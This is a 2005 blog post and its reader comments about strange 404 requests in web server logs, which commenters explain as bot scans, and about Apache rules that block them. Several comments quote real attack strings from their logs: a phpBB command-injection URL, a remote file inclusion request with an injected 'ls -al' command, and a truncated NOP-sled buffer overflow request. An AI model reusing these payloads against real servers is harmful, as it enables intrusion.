404 oddities

When I look at the server logs – or rather the list of “Required but not found URLs” that AWStats creates – for this site I find an increasing number of very strange requests for nonexistent files. Since these weird requests are repeated over and over I’m guessing most of them are from bots looking for potential ways of hacking the site or posting spam.

That’s just a guess – I don’t know for sure what it’s all about. I’ve Googled around a bit and found reasonable explanations for some of the requests, but not all of them. Please fill me in if you know more about any of these oddities.

/cgi-bin/awstats.pl
Looking for a security hole in AWStats?
/awstats/awstats.pl
Probably the same as /cgi-bin/awstats.pl.
/_vti_bin/owssvr.dll
Requested by a “Web discussions” feature in IE/Win and probably by some worms looking for servers running Microsoft software. There are several discussions on this at Webmaster World.
/MSOffice/cltreq.asp
Same as /_vti_bin/owssvr.dll.
/_vti_inf.html
Someone trying to access the site with FrontPage?
/robotsxx.txt
Maybe you were looking for robots.txt?
/robot.txt
No, it’s robots with an ‘s’.
/333333, /444444, /666666
I think *every* document on this site has been requested multiple times with /333333, /444444 or /666666 added at the end of the URL. What are they looking for?
/css/{link}
No idea what this is.
/css/%7blink%7d
Nope, you won’t find any `blink` elements here.
abcdefghijklmn.htm
Umm?
/feed_main.xml^en^456
What’s with the circumflexes?
/favicon
You’ll have more luck if you add a file extension to that.

Have you found any other goodies in your server logs? Maybe something much weirder than any of the ones I’ve mentioned? Let’s compare!

Posted on April 5, 2005 in Web General

Comments

  1. Hmm… it’s happened to me too, but I have no idea what this is =/

  2. I get most of those too, but this one has me stumped: /333333, /444444, /666666

    What is that all about? I also get ‘/sumthin’. I (jokingly) figured it was some wiseass telling me to post something useful.

  3. I get all of the above, and also /avatar.png for some reason. I have a blank robots.txt and a favicon.ico just because I was bored of seeing those two turn up in my 404s so often.

  4. There are a few weird security sites that show up when you Google for /333333

  5. If this is the first time you’ve looked at web server log files, I can see how this could be quite a surprise.

    Since the webserver logs every single request that comes in on port 80 and this port is probably the most widely used, you get a lot of crap in your log files.

    Most of the junk comes from zombie machines looking for other machines to infect, 99% of which are Windows machines.

    A “fresh install” of Windows XP/2000 is extremely unsafe to connect to the Internet (without a firewall) because there is literally a constant flow of viruses trying their best to spread their seed, most of which take advantage of the fact that lots of Windows machines have a web server running by default.

    That’s why it’s best to view your stats in a log analyzer, which excludes the bad requests from the reporting. I only open my log files if there is a problem or I’m trying to do some extra digging. My stats program (AWStats) reports the document requested that resulted in a 404 error, so I don’t need to look at the log to figure it out.

  6. I get a LOT of seemingly random English words at the ends of 404 errors, and for the life of me I can’t imagine how looking for “/noncapillary/” could be of any use to anyone.

    I’ve thought of leaving messages for web hosts in a bad request when a site doesn’t include contact info anywhere. But of course they’d have to actually read their logs to find it.

  7. Nice site Jough, thanks for that.

  8. I’ve noticed quite a common request for /cgi-bin/formmail.cgi (or something like it, I could have missed the hyphen). Looking for a security hole, apparently.

  9. April 5, 2005 by Roger Johansson (Author comment)

    Justin: I haven’t been checking the actual log files - I use AWStats. Guess I could have made that clear in the post. The requests I mentioned are a sample of the 404 errors that get logged. I’ve been wondering about some of them for quite some time so I thought I’d check what you people have to say on the matter.

  10. Hmm, that’s weird because I don’t see any of that type of stuff in my reporting (AWStats). Most of the sites I check the stats on are subdomains though, so maybe I should take a gander at the root domain stats to see what they look like, as I am sure they are full of this garbage.

    I was sure that the stats would filter out garbage, but possibly not from the 404 reports so you can better debug.

  11. I manage a site for Emmanuel College Students’ Union, and we get loads of requests designed to exploit a (now fixed) security hole in phpBB, a popular bit of forum code, which look like this:

    /forums/viewtopic.php?p=3014&highlight=%2527%252E system(chr(112)%252Echr(101)%252 Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)

    Initially I was surprised you hadn’t come across them, but it occurred to me that the crackers probably only hit you with the requests once they’ve established that you actually have a phpBB forum on the site.

  12. I get tons and tons of requests for inner pages of my sites with misspellings, for example http://www.numbera.com/rome/startegy/tools.aspx (note “startegy” instead of “strategy”), even though I can’t imagine anyone typing in a URL like that.

  13. I get the “/_vti_bin/owssvr.dll” and “/MSOffice/cltreq.asp” but nothing else interesting. Something keeps trying to access some old Atom feed I haven’t had in a year.

  14. I get them all too… they’re all exploit attempts.

    My guess on the /333333, /444444, /666666 404s is that they’re trying to exploit a known buffer overflow vulnerability. It’s probably from the NT 4 days, but I’m sure it still works on some servers out there.

  15. April 5, 2005 by Johan Schurer

    Usually many of those 404’s come from worms, script-kiddies, saved pages, overcurious people and so on.

    To tackle it I use the html-rewrite function in apache to rewrite all garbage 404’s to a 0 size file named /youhaveaworm (or what you like).

    Any further request is now logged in the access.log and the server ‘sends’ 0 bytes back saving bandwidth.

    The only downside is you have to collect and put them in your apache config.
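
    A minimal sketch of what such a setup might look like, assuming the “rewrite function” is mod_rewrite, that the rules live in httpd.conf or a virtual host, and that an empty file named youhaveaworm sits in the document root. The three patterns are only examples taken from requests mentioned in this thread; the real list is whatever you collect from your own 404 report.

    ```apache
    # Assumption: mod_rewrite is loaded and /youhaveaworm is an empty file
    # in the document root.
    RewriteEngine On

    # Internally rewrite known junk requests to the empty file, so the
    # server answers with a 0-byte body instead of the full 404 page.
    RewriteRule ^/?_vti_bin/ /youhaveaworm [L]
    RewriteRule ^/?MSOffice/cltreq\.asp$ /youhaveaworm [L]
    RewriteRule ^/?(default|NULL)\.ida$ /youhaveaworm [L]
    ```

    Note that with an internal rewrite like this the junk requests no longer show up as 404s: they are logged as ordinary successful requests for a 0-byte file.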

  16. the formmail.cgi one is an older one where some hosts would have a default email script that spammers could (ab)use to mass mail.

    Other than that, my 404s have actually been looking pretty clean as of late…

  17. I found this site that explains some of the errors.

  18. I love to send small, freaky notes to some geek friends through fake misspelled URLs. Something like “you-are-so-sexy,Joe” or “dont-talk-to-my-girl-again,pal”. It’s fun if you can see your friend’s expression at log analysis time. Unfortunately, it works only once. 8:*

  19. Have my share of these as well, especially requests for AWStats and phpBB, neither of which has been installed on my server.

    I also get a lot of requests for FrontPage related stuff. Mostly direct requests for “/_vti_bin/_vti_aut/fp30reg.dll”. Don’t know if it’s hack attempts or just misbehaving M$ software. Have had days with more than 100 requests for “_vti_bin” related stuff, obviously a bit annoying…

    Lastly there are the CodeRed variants with requests for either “/default.ida” or “/NULL.ida”. Although not nearly as numerous as the ones above, they’re really annoying since they consume a fair amount of bandwidth. Really makes me wish that people would take better care of their computers…

  20. My personal view on some of these, including awstats, is attempts by advertisers/spammers to isolate sites with high viewership. Thus, their blog comment spam and other nefarious ways are more effective and possibly strike a larger audience.

    As a side comment, your example of “blink” as you called it:

    /css/%7blink%7d

    is actually the same as /css/{link}, just URL-encoded (%7b is “{” and %7d is “}”).

  21. April 6, 2005 by gollux

    /cgi-bin/awstats.pl Looking for a security hole in AWStats? /awstats/awstats.pl Probably the same as /cgi-bin/awstats.pl.

    Bingo on the Security hole in AWStats, make sure you’re up to the proper level. There was a Secunia notice on this.

  22. Details on the AWStats exploit on ISC: http://isc.sans.org/diary.php?date=2005-03-31 http://isc.sans.org/diary.php?date=2005-03-03 http://isc.sans.org/diary.php?date=2005-03-02

    First time I’ve seen the Infocon at a colour other than green, BTW (06:13:44 GMT Apr 06 2005)

  23. This post made me smile.

    :)

    Then again, involving oddities is generally amusing.

  24. April 6, 2005 by GrumpySimon

    Welcome to the ‘net folks. Most of these are likely to be some script kiddie scanning an ip range.

    However, both AWStats and phpBB have had some major security holes discovered recently (last few months). Make sure you’ve upgraded all your software (and PHP as well, to 4.3.10 at least).

    Peter Parkes: The phpBB exploit uses Google to find vulnerable phpBB installations (IIRC it googles for a version number in the page footer).

    As for the _vti_bin ones - I just get Apache to forbid (403) any requests there.

    Another common scan to look out for is people checking to see if you’re an open proxy. This basically comes in as a request for a big website like www.microsoft.com, www.intel.com or an open proxy checker on www.helllabs.com.

    If anyone’s interested, I’ll post some Apache configuration directives to 403 them.

    —Simon

  25. April 6, 2005 by GrumpySimon

    More info:

    the abcdef… thing appears to be a scan from a bot in the Chinese ip range. It seems to be hammering sites looking for this page. Anyway, it doesn’t seem to obey robots.txt, so kill it.

    More info: ejhweb.com

    The robotsxx.txt is a bot: PlantyNetWebRobotV1, out of hinet.com in Taiwan, and obviously doesn’t obey bot rules. Ban it.

    —Simon

  26. I get lots of those as well, although I haven’t seen the numeric ones yet. Lots of attempts to find formmail scripts, but then again, I know quite well spammers have found my blog. :(

    I’ve had quite a few requests for /mobots.txt as well. A dyslexic spider? :)

  27. I have about the same as you do. Some other things that bug me.

    The first post I wrote in my blog gets hit really hard by robots (three times as much as my most popular post), not sure why.

    Some hacker stuff:

    • /?p=http://www.geociNOTSPAMties.com/blackengine2004/ilustrator.txt?&cmd=ls%20-al

    • /phpmyadmin/css/phpmyadmin.css.php?lang=en-iso-8859-1&jsframe=right&jsisDOM=1

    Nice to see what people really are doing at your site. The worrying thing is that you can never be sure whether they have hacked the server. If they are good, they would remove all traces of themselves from the logs. Hopefully this has not happened. :D

    PS. Had to add NOTSPAM into the URL so I could get around the spam filter on this blog.

  28. My site emails me with ‘broken links’: 404s where the referrer is my site.

    I see a lot of spoofed-referrer attempts for “/cgi-bin/formmail.pl”, and many, many variants (I don’t have a cgi-bin directory).

    The odd thing is that I rarely see requests for the same variant. Some examples: /cgi-bin/email_wm.cgi /cgi-bin/formmail.cgi /cgi-bin/cgiemail/form.mail /cgi-local/mail.cgi /cgi-bin/cgiemail/forms/order.txt

    …and so on

  29. The most common Script Kiddie attack/requests I tend to receive daily are: “/cgi-bin/formmail.pl” from Thailand, Mexico, Africa and such places though obviously they must think I am stupid if they are looking for that file there.

    Maybe they are short of money and would like a free spam-mail box. ;-)

    Yes, I have seen such oddness as “/_vti_bin/owssvr.dll” or “/MSOffice/cltreq.asp” from what appears to be MSIE 6.0 on NT on an all-too-regular basis.

    Also, a few website rippers get logged looking for weird directories on my Beck site, and last month a Novell cache server went berserk looking for a file I had sitting on my other server all along; the thing was requesting it every second for long periods of time…

    Some odd results come from Agents looking for image files I have commented out in my CSS files using: /* url(“image.jpg”);*/ now that is peculiar.

    I always tend to trace the IP ranges if they look suspect.

  30. I get this all the time on my FTP server also. I laugh at some of the usernames and passwords they try.

  31. Inspired by this post, I went through my own server logs and came across a lot of strange things. I assembled the top five into a blog post.

    One difference from Roger’s info is that my serverlogging-system prints out a few more things, for instance the IP-address and UA of the visitor.

  32. April 6, 2005 by Roger Johansson (Author comment)

    Charles: Ah, I missed that URL encoding. I guess “blink” stood out too much and caught my attention, eh ;-)

    For those suggesting that AWStats should be updated to plug the security hole: thanks, I have that covered, plus the AWStats directory is named something else and requires a login and password to access.

    Jens: Yeah sorry about that. It’s an unfortunate side-effect of the measures I’ve taken to prevent comment spam.

    GrumpySimon: Some of those Apache directives would be interesting, so please post them.

  33. A couple of suggestions, if you’re running Apache with some control over it:

    1. tag bad requests using SetEnvIf. E.g. from people without User-Agent strings, or with fishy ones, and common script-kiddie attacks like the ones you mention above.
    2. dump all these requests into a separate log, so it’s not in your main log cluttering things up and skewing your statistics.
    3. deny the tagged requests access.
    4. set up a virtual host with ServerName and block all requests on that vhost. How many legitimate visitors are going to visit your site by IP address?

    This is how I do it. Works well for me. But then, my server is in my bedroom on a cable modem. Not so easy if you’re buying hosting from someone!
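
    A rough sketch of steps 1 to 3, written in the same Apache 2.0/2.2 style access syntax used elsewhere in this thread (on 2.4 the Order/Deny lines would need mod_access_compat). The variable name bad_req, the log file names and the two URL patterns are placeholders chosen for illustration, and the “combined” log format is assumed to be defined as in the stock httpd.conf.

    ```apache
    # 1. Tag suspicious requests (assumes mod_setenvif is loaded).
    #    A missing User-Agent header is treated as an empty string.
    SetEnvIf User-Agent "^$" bad_req
    SetEnvIf Request_URI "^/_vti_bin/" bad_req
    SetEnvIf Request_URI "formmail" bad_req

    # 2. Send tagged requests to their own log and keep them out of the
    #    main one. Both file names are hypothetical.
    CustomLog logs/bad_requests_log combined env=bad_req
    CustomLog logs/access_log combined env=!bad_req

    # 3. Refuse (403) anything that was tagged.
    <Location />
       Order Allow,Deny
       Allow from all
       Deny from env=bad_req
    </Location>
    ```

    Keeping the tagging in one place means each new pattern you spot only needs one extra SetEnvIf line; the logging and the denial pick it up automatically.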

  34. Well, know (some of) those errors, too. Another popular phenomenon causing errors are IRI modifications, of course (when people are guessing an IRI - some people e.g. try to access a “de” path on http://uitest.com/en/check/, and it currently really draws in IRI hackers).

    However, I recommend enabling the “CheckSpelling” directive (part of mod_speling) on Apache servers, which can correct some IRI spelling errors (for example, if someone forgets a letter or a single character is just wrong). Simply add the following line to your .htaccess:

    CheckSpelling On

    Performance losses are usually minimal, but the benefits are high (happier users, happier error logs).

  35. I also get /sumthin. We get it from at least 3 different IP addresses 40 or 50 times a month usually in groups of 3 requests in close proximity.

    Give it up already - you are getting nuthin!

  36. /index.com? That’s an odd one…

  37. April 7, 2005 by SugarKane

    I get all the above and more. But the ones that confuse me are things like: /pelikansio/makatea.htm …. the file name is correct but the directory does not exist and never has. I get a heap of these, with each non-existent directory having a nonsensical name. Who or what makes up these directory names?

  38. April 8, 2005 by GrumpySimon

    I use these commands in my httpd.conf. The first stops the CONNECT:1:3:3:7 attempt which is a scan to see if your server allows tunneling proxy servers (and is often used by spammers).

    The second forbids any access to /cgi-bin/ and /_vti_bin/. I don’t have anything in cgi-bin on my server, but you may need to allow this.

    You can modify these (change the location bit) to include anything else which is getting requested often.

    —Simon

    #Stops those dodgy CONNECT:1:3:3:7 Scans and 403's them
    
       
          Order Deny,Allow
          Deny from all
       
    
    
    # 403 all cgi-bin and _vti_bin requests
    
       Deny from all
    
    
       Deny from all
    
    
  39. April 8, 2005 by GrumpySimon

    Bah, eating my brackets.

    #Stops those dodgy CONNECT:1:3:3:7 Scans and 403's them
    <Location />
       <Limit CONNECT>
          Order Deny,Allow
          Deny from all
       </Limit>
    </Location>
    
    # 403 all cgi-bin and _vti_bin requests
    <Location "/cgi-bin">
       Deny from all
    </Location>
    <Location "/_vti_bin">
       Deny from all
    </Location>
    
  40. April 8, 2005 by Roger Johansson (Author comment)

    GrumpySimon: Thanks for sharing. I’ll take a look at implementing that to clean things up.

    Sorry about the preview eating your brackets. It’s a long-standing problem with Movabletype that I don’t know how to fix. I’d much appreciate any help with fixing that, so if anyone knows anything about it…

    And to whoever is having fun sending me nice little messages by requesting non-existent files: I keep an eye on the list of 404 errors to detect any broken links or other problems. I also tend to add a redirect if someone posts a broken link to one of my articles in a forum or on a mailing list. That happens quite a lot, actually. I figure it’s better if I redirect those people to the document they are looking for instead of letting them end up on my 404 page. Getting rid of all the nonsense requests would make any such problems much easier to find.

  41. April 9, 2005 by Joonas

    In SugarKane’s example /pelikansio/makatea.htm, the directory name is in fact a Finnish word. Its meaning is ‘game folder’ so it would make sense if someone had a directory named just that. Perhaps these bots are ripping directory names from other people’s sites, although I can’t really find any sense in doing that.

  42. Some oddities from my own logs:

    • /feeds/rss%22%20type=application/rss+xml%20rel=alternate%3E%3CLINK%20title=
    • /quark/archives/C:\Folder\file.txt
    • /archives/2005/04/submit-it-and-google-tos-violations/ - I have extensionless files, not directories. These requests seem to be made by a spam harvester, so I don’t worry too much that they 404.
    • /gallery/css/rounded/Rounded%20Corners%20in%20CSS%20-%20Virtuelvis_files/top-right.png - some program seems to have problems with Save as.
    • /archives/http:
    • /feeds/bmrss%22%3ERSS%3C/A%3E)%3C/P%3E%0D%0A%3CH3%3E%3CA%20href= - most likely some attempt at using my feeds as a redirector, something which will fail horribly.
  43. The general css/{link} request can be a result of people exploring your CSS (I am guilty of this). In Safari you can open the activity viewer and double-click a CSS file to view it. Safari opens the CSS file in a new window, resulting in a direct request for said file; therefore the server records that as a request (just wanted to make it clear).

    There is a technique out there to hide CSS from direct access. I believe PHP was used, and it would give a message like “thanks for taking interest in my css…” when you try to access it. But for the life of me (or about 30 minutes of searching) I can’t find the blog. The blog also features a content shadow technique that was impressive. Dark blue and red color scheme, if anybody knows ;-)

  44. April 11, 2005 by Stefano

    Maybe it’s due to some spam programs… When you get a 404, the email address of the site owner is displayed.

  45. me too~!

  46. I’m running my webserver on a linux box, however that doesn’t stop all those skiddies from trying to get a ‘cmd.exe’ shell. Sadly, it isn’t just once or twice, it is HUNDREDS of times.

  47. Maybe it’s due to some spam programs… When you get a 404, the email address of the site owner is displayed.

    This is an option in the Apache configuration. You can disable it for every Virtual Host or globally. The directive is named ServerSignature. Set it to On or Off instead of Email.
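
    For example, a one-line sketch for httpd.conf (the same line can also go inside a single virtual host block), assuming you want no footer at all on server-generated pages:

    ```apache
    # Server-generated pages such as the default 404 get no footer line,
    # so no mailto: link to the ServerAdmin address is exposed.
    ServerSignature Off
    ```

    With On instead of Off, the footer shows the server version and host name but still leaves out the email link.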

    I used to get a lot of requests from hinet.com on port 25 but since I’ve blocked them they haven’t returned :=D

    Anyone ever come across this one though?

    [07/May/2005:11:55:46 +0100] “SEARCH /\x90\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9…

    It goes on for another 300 characters…

    [Edit: Removed a very long line. /Roger]

  48. I’ve noticed an entertaining 404 error in my logs recently: A robot of some sort is trying to access a valid URL, but they’ve surrounded one of the words in the file name with HTML markup. Thus far it’s only been the bold markup. I can write an .htaccess directive to strip the markup - should I?

Comments are disabled for this post (read why), but if you have spotted an error or have additional info that you think should be in this post, feel free to contact me.